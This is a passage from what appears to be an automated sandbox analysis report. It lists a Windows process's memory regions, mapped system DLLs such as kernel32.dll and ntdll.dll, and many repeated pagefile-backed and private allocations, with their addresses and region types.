"shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 783 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 784 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 785 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 786 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 787 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 788 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 789 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 790 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 791 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 792 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 793 start_va = 0x7ffc5eac0000 end_va = 0x7ffc5ec19fff monitored = 0 entry_point = 0x7ffc5eb038e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 794 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 795 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 796 start_va = 0x7ffc5ee90000 end_va = 0x7ffc5f2b8fff monitored = 0 entry_point = 0x7ffc5eeb8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 797 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 798 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 799 start_va = 0x7ffc5f6f0000 end_va = 0x7ffc5f75efff monitored = 0 entry_point = 0x7ffc5f715f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 800 start_va = 0x7ffc5f760000 end_va = 0x7ffc5f806fff monitored = 0 entry_point = 0x7ffc5f76b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 801 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 803 start_va = 0x420000 end_va = 0x435fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 804 start_va = 0x10c60000 end_va = 0x10cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c60000" filename = "" Region: id = 805 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 806 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 807 start_va = 0x10ce0000 end_va = 0x10d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ce0000" filename = "" Region: id = 808 start_va = 0x10d60000 end_va = 0x10ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010d60000" filename = "" Region: id = 809 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 810 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 811 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 812 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 813 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 814 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 815 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 816 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 817 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 818 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 819 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 820 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 821 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 822 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 823 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 824 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 825 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 826 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 827 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 828 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 829 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 830 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 831 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 832 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 833 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 834 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 835 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 836 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 837 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 838 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 839 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 840 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 841 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 842 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 843 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 844 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 845 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 846 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 847 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 848 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 849 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 850 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 851 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 852 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 853 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 854 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 855 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 856 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 857 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 858 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 859 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 860 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 861 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 862 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 863 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 864 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 865 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 866 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 867 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 868 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 869 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 870 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 871 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 872 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 873 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 874 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 875 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 876 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 877 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 878 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 879 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 880 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 881 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 882 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 883 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 884 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 885 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 886 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 887 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 888 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 889 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 890 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 891 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 892 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 893 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 894 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 895 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 896 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 897 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 898 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 899 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 900 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 901 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 902 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 903 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 904 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 905 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 906 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 907 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 908 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 909 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 910 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 911 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 912 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 913 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 914 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 915 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 916 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 917 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 918 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 919 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 920 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 921 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 922 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 923 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 924 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 925 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 926 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 927 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 928 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 929 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 930 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 931 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 932 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 933 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 934 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 935 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 936 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 937 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 938 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 939 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 940 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 941 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 942 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 943 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 944 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 945 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 946 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 947 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 948 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 949 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 950 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 951 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 952 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 953 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 954 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 955 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 956 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 957 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 958 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 959 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 960 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 961 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 962 